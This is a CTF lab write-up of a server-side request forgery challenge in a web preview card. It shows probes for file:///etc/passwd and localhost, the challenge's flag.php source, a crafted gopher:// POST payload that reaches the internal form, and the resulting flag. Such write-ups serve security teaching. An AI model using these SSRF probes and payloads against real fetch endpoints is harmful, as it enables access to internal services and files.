Simple Web 0x12(Lab - Web Preview Card)

Posted on | Post modified | In |

Simple Web 0x12(Lab - Web Preview Card)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8500/

Background

Web Hacking | 續章【EDU-CTF 2021】 網站安全🔒 伺服器端請求偽造 SSRF 攻擊 — 「項莊舞劍,意在沛公」

Exploit - SSRF

When you see a preview function, then it may have SSRF problem.

  1. Test it file:///etc/passwd or http://127.0.0.1

  2. Analyze flag.php :::spoiler source code 
     <?php
 if ($_SERVER['REMOTE_ADDR'] !== '127.0.0.1') die("Only for localhost user.");
 ?>
 <form action="/flag.php" method="post">
     Do you want the FLAG? <input type="text" name="givemeflag" value="no">
     <input type="submit">
 </form>
 <?php
 if (isset($_POST['givemeflag']) && $_POST['givemeflag'] === 'yes')
     echo "FLAG:", getenv('FLAG');

    ::: If you want flag, you need visit /flag.php as localhost and send a form data with parameter givemeflag.

  3. Construct package - **gopher** 
     POST /flag.php HTTP/1.1
 Host: 127.0.0.1
 Content-Length: 14
 Content-Type: application/x-www-form-urlencoded

 givemeflag=yes

    Transferred by urlencode with CRLF type. Payload: gopher://127.0.0.1:80/_POST%20%2Fflag.php%20HTTP%2F1.1%0d%0aHost%3A%20127.0.0.1%0d%0aContent-Length%3A%2014%0d%0aContent-Type%3A%20application%2Fx-www-form-urlencoded%0d%0a%0d%0agivemeflag%3Dyes%0d%0a

  4. Then we got flag…

Flag: FLAG{gopher://http_post}